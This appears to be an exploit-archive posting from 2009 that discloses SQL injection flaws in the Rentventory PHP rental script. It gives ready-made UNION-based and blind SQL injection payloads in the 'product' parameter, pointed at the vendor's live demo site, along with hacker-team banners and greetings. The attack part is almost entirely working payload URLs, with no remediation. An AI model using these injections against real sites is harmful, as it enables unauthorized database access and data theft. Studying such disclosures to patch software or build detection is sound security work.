[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Rentventory Multiple Remote SQL Injection Vulnerabilities
# Published : 2009-07-02
# Author : Moudi
# Previous Title : Opial 1.0 (albumid) Remote SQL Injection Vulnerability
# Next Title : Messages Library 2.0 Arbitrary Delete Message Vulnerability


###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             

==============================================================================
        [??] ~Fleck i love you :D hahaha
==============================================================================
        [??] Rentventory PHP (SQL/Blind) Multiple Vulnerabilities
==============================================================================

	[??] Script:             [ Rentventory ]
	[??] Language:           [ PHP ]
        [??] Download:           [ http://www.rentventory.com/ ]
	[??] Founder:            [ Moudi or SixSo <m0udi@9.cn> ]
        [??] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em man .... ]
        [??] Team:               [ EvilWay ]
        [??] SiteWeb:            [ Visit - www.opensc.ws ]
        [??] Price:              [ $39 ]

###########################################################################

===[ Exploit SQL ]===	
	
	[??] http://www.site.com/patch/?product=[SQL]&panel=rent%2Fselect_time

===[ LIVE DEMO ]===	

        [??] http://www.rentventory.com/demo/?product=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12&panel=rent%2Fselect_time

===[ Exploit BLIND SQL ]===	

       [??] http://www.site.com/patch/?product=[BLIND]&panel=rent%2Fselect_time

===[ LIVE DEMO ]===

       [??] http://www.rentventory.com/demo/?product=1+AND+SUBSTRING(@@version,1,1)=5&panel=rent%2Fselect_time


Author: Moudi

###########################################################################

# www.Syue.com [2009-07-02]